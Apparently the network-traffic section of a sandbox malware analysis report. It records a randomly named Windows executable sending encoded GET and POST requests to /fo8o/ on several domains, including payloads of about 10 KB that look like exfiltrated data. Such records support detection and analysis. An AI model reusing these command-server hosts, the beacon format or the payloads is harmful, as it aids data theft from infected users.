                                                                                  HTTP Request Dependency Graph

                                                                                  • www.3xfootball.com
                                                                                  • www.goldenjade-travel.com
                                                                                  • www.magmadokum.com
                                                                                  • www.rssnewscast.com
                                                                                  • www.techchains.info
                                                                                  • www.elettrosistemista.zip
                                                                                  • www.empowermedeco.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449736154.215.72.110805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:11:45.475092888 CET506OUTGET /fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.3xfootball.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:11:47.039231062 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 25 Nov 2024 17:11:46 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449737116.50.37.244805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:11.509748936 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
                                                                                  Nov 25, 2024 18:12:13.098665953 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Mon, 25 Nov 2024 17:12:12 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449740116.50.37.244805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:14.163758039 CET820OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449748116.50.37.244805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:16.954519033 CET10902OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykv [TRUNCATED]
                                                                                  Nov 25, 2024 18:12:18.516350985 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Mon, 25 Nov 2024 17:12:17 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449757116.50.37.244805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:19.609487057 CET513OUTGET /fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:12:21.188296080 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Mon, 25 Nov 2024 17:12:20 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.44979185.159.66.93805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:35.389682055 CET779OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.44979885.159.66.93805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:38.046266079 CET799OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                                                                  Data Ascii: 7BpTBrLp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.44980585.159.66.93805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:40.697352886 CET10881OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.magmadokum.com
                                                                                  Origin: http://www.magmadokum.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.magmadokum.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 [TRUNCATED]
